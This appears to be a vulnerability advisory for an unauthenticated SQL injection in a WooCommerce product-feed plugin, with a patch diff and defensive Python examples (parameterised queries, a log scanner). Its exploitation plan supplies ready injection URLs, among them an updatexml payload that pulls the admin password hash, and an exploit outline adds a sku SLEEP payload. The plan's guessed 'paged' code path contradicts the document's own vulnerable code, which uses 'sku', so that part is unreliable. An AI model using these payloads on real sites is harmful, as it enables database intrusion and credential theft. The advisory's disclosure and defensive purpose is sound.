Feed KuantoKusta for WooCommerce – Free <= 5.3 - Unauthenticated SQL Injection
Description
The Feed KuantoKusta for WooCommerce – Free plugin for WordPress is vulnerable to SQL Injection in versions up to, and including, 5.3 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.
CVSS Vector Breakdown
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
Technical Details
Affected versions: <= 5.3
What Changed in the Fix
Changes introduced in v5.3.1
Source Code
WordPress.org SVN
This research plan outlines the steps to verify and exploit an unauthenticated SQL injection vulnerability in the Feed KuantoKusta for WooCommerce – Free plugin (versions <= 5.3).
1. Vulnerability Summary
The vulnerability exists in the product feed generation logic of the plugin. Specifically, the WC_Feed_KuantoKusta::render_feed() method (invoked via the add_products_feed hook on init) processes user-supplied parameters from the URL (likely paged) to filter or paginate the feed. These parameters are concatenated directly into a raw SQL query executed via $wpdb->get_col or $wpdb->get_results without using $wpdb->prepare() or proper integer casting (e.g., absint()). This allows an unauthenticated attacker to inject arbitrary SQL commands.
2. Attack Vector Analysis
- Endpoint: /?feed=kuantokusta
- Vulnerable Parameter: paged (or potentially tax_id / category_id if present in version 5.3). Based on the patch analysis for similar plugins by the same author, paged is the most common sink in their feed generators.
- Authentication: Unauthenticated. Feed generation is a public feature designed for price comparison bots.
- Preconditions:
- WooCommerce must be active.
- At least one product should be published to ensure the query logic is fully exercised.
3. Code Flow
- Hook Registration: In includes/class-wc-feed-kuantokusta.php, the init_hooks() method registers add_products_feed on the WordPress init hook: add_action( 'init', array( $this, 'add_products_feed' ) );
- Trigger: When a request contains feed=kuantokusta, the add_products_feed() method is executed.
- Feed Rendering: add_products_feed() calls render_feed().
- SQL Sink: Inside render_feed(), the plugin retrieves the paged parameter from $_GET['paged'] or get_query_var('paged').
- Vulnerable Query: The value is used to calculate the LIMIT or OFFSET or is directly concatenated into a query like:

```php
$paged = $_GET['paged']; // Unsanitized
$results = $wpdb->get_col("SELECT ID FROM {$wpdb->posts} WHERE ... LIMIT 100 OFFSET " . ($paged-1)*100 );
// Note: If $paged is a string like "1 AND (SELECT 1 FROM (SELECT(SLEEP(5)))a)",
// and the code doesn't cast to int, it can break out of the intended query.
```
4. Nonce Acquisition Strategy
No nonce is required.
The feed generation functionality is intentionally public to allow KuantoKusta's external servers to fetch the XML product feed. There are no nonce checks or capability checks (current_user_can) in the add_products_feed or render_feed code paths.
5. Exploitation Strategy
We will use a time-based blind SQL injection to confirm the vulnerability, as it is the most reliable method for unauthenticated testing without needing to know the exact XML structure or column count for a UNION-based attack.
Step 1: Confirmation of Feed Access
First, verify that the feed endpoint is active and returning data.
- Request: GET /?feed=kuantokusta
- Expected: An XML response starting with <?xml containing product data.
Step 2: Time-Based SQL Injection (SLEEP)
Attempt to trigger a delay using the paged parameter.
- Request:
  GET /?feed=kuantokusta&paged=1%20AND%20(SELECT%201%20FROM%20(SELECT(SLEEP(5)))a) HTTP/1.1
  Host: localhost
- Analysis: If the response takes approximately 5 seconds longer than the baseline, the injection is successful.
Step 3: Data Extraction (Error-Based)
If the site has WP_DEBUG enabled, we can attempt to extract the admin password hash directly using updatexml or extractvalue.
- Request:
  GET /?feed=kuantokusta&paged=1%20AND%20updatexml(1,concat(0x7e,(SELECT%20user_pass%20FROM%20wp_users%20LIMIT%201),0x7e),1) HTTP/1.1
  Host: localhost
- Expected: A database error message containing the password hash (e.g., XPATH syntax error: '~$P$B...').
6. Test Data Setup
- Activate WooCommerce: Ensure the plugin is active and configured.
- Create a Product: wp post create --post_type=product --post_status=publish --post_title="Test Product"
- Ensure Plugin is Active: wp plugin activate woocommerce feed-kuantokusta-for-woocommerce
7. Expected Results
- Baseline: GET /?feed=kuantokusta returns quickly (< 500ms).
- Exploit: GET /?feed=kuantokusta&paged=1%20AND%20(SELECT...SLEEP(5)...) returns after ~5 seconds.
- Data Leak: The SQL error or time delay confirms that user input is being processed as part of the database query.
8. Verification Steps
After the exploit, verify the vulnerability status using WP-CLI to check the database logs or error states (if enabled):
- Check if any new entries appeared in the error log.
- Manually run the same query via wp db query to see if it executes as expected:
  wp db query "SELECT ID FROM wp_posts WHERE post_type = 'product' LIMIT 1 OFFSET 1 AND (SELECT 1 FROM (SELECT(SLEEP(2)))a)"
9. Alternative Approaches
If paged does not yield results, try the following parameters which are common in feed filtering:
- kk_paged
- tax_id
- cat_id
- category
Example for tax_id: /?feed=kuantokusta&tax_id=1)%20AND%20(SELECT%201%20FROM%20(SELECT(SLEEP(5)))a
Summary
The Feed KuantoKusta for WooCommerce plugin is vulnerable to unauthenticated SQL Injection via the 'sku' GET parameter in versions up to 5.3. The vulnerability occurs because the plugin concatenates user-supplied SKU data directly into a raw SQL query string used for product exclusion, bypassing WordPress's database abstraction security features.
Vulnerable Code
```php
// includes/class-wc-feed-kuantokusta.php line 613
if ( isset( $_GET['sku'] ) && trim( sanitize_text_field( wp_unslash( $_GET['sku'] ) ) ) !== '' ) {
    $sql_exclude .= " || ( meta_key = '_sku' AND meta_value NOT LIKE '%" . trim( sanitize_text_field( wp_unslash( $_GET['sku'] ) ) ) . "%' )";
}
```
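As an added, stand-alone illustration (not the plugin's code) of what moving the SKU into a bound parameter buys, and of the LIKE-wildcard detail it does not cover by itself, the following Python script models the `_sku` exclusion clause against an in-memory SQLite table. `SAMPLE_POSTMETA`, `esc_like()` (a model of `$wpdb->esc_like()`) and the two query functions are constructed for this example; the parameter marker is SQLite's `?` rather than `$wpdb->prepare()`'s `%s`, but the principle is the same: the query text is fixed before the user value is seen.

```python
import sqlite3

# Constructed rows modelling wp_postmeta entries that carry product SKUs.
SAMPLE_POSTMETA = [
    (1, "_sku", "ABC-100"),
    (2, "_sku", "ABC-200"),
    (3, "_sku", "XYZ-300"),
    (4, "_sku", "A_C-400"),
]


def open_db():
    """Build an in-memory table shaped like the postmeta columns the feed queries."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE postmeta (post_id INTEGER, meta_key TEXT, meta_value TEXT)")
    conn.executemany("INSERT INTO postmeta VALUES (?, ?, ?)", SAMPLE_POSTMETA)
    return conn


def esc_like(value):
    """Escape LIKE metacharacters so they match literally (models $wpdb->esc_like()).
    The backslash is escaped first so user-supplied backslashes cannot cancel the
    escapes added for % and _."""
    return value.replace("\\", "\\\\").replace("%", "\\%").replace("_", "\\_")


def feed_post_ids_bound_only(conn, sku):
    """Exclusion rule with the value bound as a parameter but wildcards left unescaped.
    Injection is impossible, yet '%' or '_' in the value still act as wildcards."""
    pattern = "%" + sku.strip() + "%"
    rows = conn.execute(
        "SELECT post_id FROM postmeta WHERE meta_key = '_sku' "
        "AND meta_value NOT LIKE ? ORDER BY post_id",
        (pattern,),
    ).fetchall()
    return [r[0] for r in rows]


def feed_post_ids_hardened(conn, sku):
    """Exclusion rule with the value bound AND its wildcards escaped, so the
    user-supplied fragment can only ever be matched as a literal substring."""
    pattern = "%" + esc_like(sku.strip()) + "%"
    rows = conn.execute(
        "SELECT post_id FROM postmeta WHERE meta_key = '_sku' "
        "AND meta_value NOT LIKE ? ESCAPE '\\' ORDER BY post_id",
        (pattern,),
    ).fetchall()
    return [r[0] for r in rows]


if __name__ == "__main__":
    db = open_db()
    for sku in ("ABC", "%", "A_C", "' OR 1=1 --"):
        print(repr(sku), feed_post_ids_bound_only(db, sku), feed_post_ids_hardened(db, sku))
```

With a bound parameter, a value such as `' OR 1=1 --` is just a string no SKU contains, so every product survives the exclusion and the query structure is untouched. The second function shows the remaining gap: `%` on its own excludes every product unless the wildcards are escaped, which is why `esc_like` belongs in front of the `prepare()` call as well.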
Security Fix
@@ -611,7 +611,8 @@ // Debug and only include specific SKU // phpcs:disable WordPress.Security.NonceVerification.Recommended if ( isset( $_GET['sku'] ) && trim( sanitize_text_field( wp_unslash( $_GET['sku'] ) ) ) !== '' ) { - $sql_exclude .= " || ( meta_key = '_sku' AND meta_value NOT LIKE '%" . trim( sanitize_text_field( wp_unslash( $_GET['sku'] ) ) ) . "%' )"; + $sku_like = '%' . trim( sanitize_text_field( wp_unslash( $_GET['sku'] ) ) ) . '%'; + $sql_exclude .= $wpdb->prepare( " || ( meta_key = '_sku' AND meta_value NOT LIKE %s )", $sku_like ); } // phpcs:enable $results = $wpdb->get_results( $sql_exclude, ARRAY_A ); // phpcs:ignore WordPress.DB.DirectDatabaseQuery.DirectQuery, WordPress.DB.DirectDatabaseQuery.NoCaching, WordPress.DB.PreparedSQL.NotPrepared
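Review bot: the `prepare()` call closes the injection, but the `%` wildcards are wrapped around the raw value without `$wpdb->esc_like()`, so a `sku` containing `%` or `_` is still interpreted as a LIKE wildcard rather than a literal SKU fragment; build the pattern as `$sku_like = '%' . $wpdb->esc_like( trim( sanitize_text_field( wp_unslash( $_GET['sku'] ) ) ) ) . '%';`. The `phpcs:ignore ... WordPress.DB.PreparedSQL.NotPrepared` kept on `$results = $wpdb->get_results( $sql_exclude, ARRAY_A );` also signals that the rest of `$sql_exclude` is still assembled outside `prepare()`; the visible lines do not show where those other fragments come from, so either give them the same treatment or add a comment stating that they are constant. Finally, the comment `// Debug and only include specific SKU` reads as the opposite of the `NOT LIKE` exclusion beneath it and should say "exclude".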
Exploit Outline
An attacker can exploit this vulnerability by sending a crafted GET request to the site's feed endpoint (typically /?feed=kuantokusta). By supplying a malicious payload in the 'sku' parameter, such as ') OR (SELECT 1 FROM (SELECT(SLEEP(5)))a)-- -', the attacker can break out of the intended LIKE clause. Because the feed generation logic is hooked into the WordPress 'init' action without authentication or nonce checks, any unauthenticated visitor can trigger the injection to perform time-based blind SQL injection or error-based extraction of sensitive database information.
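To give the defensive side of the outline above a concrete shape, here is an added Python example (not from this advisory or the plugin) that scans web-server access-log lines in combined format for requests to the `kuantokusta` feed whose `sku`, `paged` or other query parameters carry the SQL-injection indicators this page describes. The lines in `SAMPLE_LOG`, the IP addresses and the user agents are constructed; the two flagged requests reuse the payload shapes already quoted on this page. `LOG_RE`, `SQLI_PATTERNS`, `classify_param()` and `analyze_log()` are this example's own names.

```python
import re
from urllib.parse import parse_qs, unquote_plus, urlsplit

# Constructed combined-format access-log lines (not real traffic).
SAMPLE_LOG = """\
203.0.113.10 - - [10/May/2024:12:00:01 +0000] "GET /?feed=kuantokusta HTTP/1.1" 200 48213 "-" "KuantoKustaBot/1.0"
203.0.113.10 - - [10/May/2024:12:00:02 +0000] "GET /?feed=kuantokusta&sku=ABC-100 HTTP/1.1" 200 47102 "-" "KuantoKustaBot/1.0"
198.51.100.7 - - [10/May/2024:12:00:03 +0000] "GET /?feed=kuantokusta&sku=%27%29%20OR%20%28SELECT%201%20FROM%20%28SELECT%28SLEEP%285%29%29%29a%29--%20- HTTP/1.1" 200 48213 "-" "python-requests/2.31"
198.51.100.7 - - [10/May/2024:12:00:09 +0000] "GET /?feed=kuantokusta&paged=1%20AND%20updatexml(1,concat(0x7e,(SELECT%20user_pass%20FROM%20wp_users%20LIMIT%201),0x7e),1) HTTP/1.1" 500 1203 "-" "python-requests/2.31"
192.0.2.5 - - [10/May/2024:12:00:10 +0000] "GET /?p=12 HTTP/1.1" 200 9120 "-" "Mozilla/5.0"
"""

# Fields of a combined-format line that the triage needs.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" '
    r"(?P<status>\d{3}) (?P<size>\S+)"
)

# Content indicators for SQL injection attempts, labelled for the finding.
SQLI_PATTERNS = [
    ("sleep()", re.compile(r"\bsleep\s*\(", re.I)),
    ("benchmark()", re.compile(r"\bbenchmark\s*\(", re.I)),
    ("updatexml()/extractvalue()", re.compile(r"\b(updatexml|extractvalue)\s*\(", re.I)),
    ("UNION SELECT", re.compile(r"\bunion\s+(all\s+)?select\b", re.I)),
    ("SELECT ... FROM", re.compile(r"\bselect\b.+\bfrom\b", re.I | re.S)),
    ("SQL comment sequence", re.compile(r"(--|/\*)")),
]


def classify_param(name, value):
    """Return the list of reasons a feed query parameter looks like an injection attempt.
    Structural checks (paged must be an integer, sku must not carry quotes or parentheses)
    catch probes that content signatures miss; the signatures catch the known primitives."""
    reasons = []
    if name == "paged" and not value.isdigit():
        reasons.append("paged is not an integer")
    if name == "sku" and re.search(r"['\"()]", value):
        reasons.append("sku contains quote or parenthesis")
    for label, pattern in SQLI_PATTERNS:
        if pattern.search(value):
            reasons.append(label)
    return reasons


def analyze_log(text):
    """Scan log text and return one finding per suspicious feed parameter, in log order."""
    findings = []
    for line in text.splitlines():
        match = LOG_RE.match(line)
        if not match:
            continue
        query = parse_qs(urlsplit(match.group("target")).query, keep_blank_values=True)
        if query.get("feed", [""])[0] != "kuantokusta":
            continue  # only the vulnerable endpoint is in scope here
        for name, values in query.items():
            for raw in values:
                value = unquote_plus(raw)  # second decode catches double-encoded payloads
                reasons = classify_param(name, value)
                if reasons:
                    findings.append({
                        "ip": match.group("ip"),
                        "timestamp": match.group("ts"),
                        "status": int(match.group("status")),
                        "param": name,
                        "value": value,
                        "reasons": reasons,
                    })
    return findings


if __name__ == "__main__":
    for finding in analyze_log(SAMPLE_LOG):
        print(finding["timestamp"], finding["ip"], finding["param"], finding["reasons"])
```

The bot's normal feed fetches and a plain `sku=ABC-100` filter pass through untouched, while both probe shapes are reported with the reasons that fired. Combined format records no response time; if the server logs nginx's `$request_time` or Apache's `%D`, correlating flagged requests with latency spikes of roughly the `SLEEP()` argument turns the `sleep()` signature into a strong confirmation that the query actually executed, and a 500 status on an `updatexml()` hit points at a database error reaching the client.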